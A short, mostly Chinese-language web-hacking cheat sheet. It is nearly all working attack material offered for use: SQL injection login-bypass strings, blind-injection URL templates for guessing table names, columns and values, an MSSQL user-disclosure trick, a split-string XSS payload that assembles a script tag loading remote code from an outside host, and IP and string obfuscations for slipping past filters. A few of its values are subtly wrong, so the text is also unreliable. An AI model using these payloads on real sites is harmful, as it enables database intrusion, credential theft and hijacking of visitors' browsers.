null

' or 1=1--
" or 1=1--
or 1=1--


' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a


在ASP下的工具有NBSI,啊D,明小子的Domain
在PHP下有工具有PHP-Mysql注射分析器,CASI,HDSI


猜解表名:
http://www.xxx.com/xx.asp?id=x and exists(select * from 表名)
猜解列名:
http://www.xxx.com/xx.asp?id=x and exists(select 列名 from 表名)
猜解列的長度:
http://www.xxx.com/xx.asp?id=x and (select top 1 len(列名) from 表名)>1、>2、>3。。。
猜解列：
http://www.xxx.com/xx.asp?id=x and (select top 1 asc(mid(adminname,1,1)) from config)>50


MSSQL:
http://www.xxx.com/xxx.asp?id=x and user>0就可以得到當前用戶的用戶名了


xss突破長度限制：
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>


像127.0.0.1這樣的ip還可以變作2130706443、0x7f.0x00.0x00.0x01、0177.0000.0000.0001等。


$_GET $_POST $_REQUEST




select * from members where username=char(97,100,109,105,110);
select * from members where username=0x616463696e


ASP、PHP等腳本語言都是屬於解釋性語言，而JSP是屬於編譯性語言。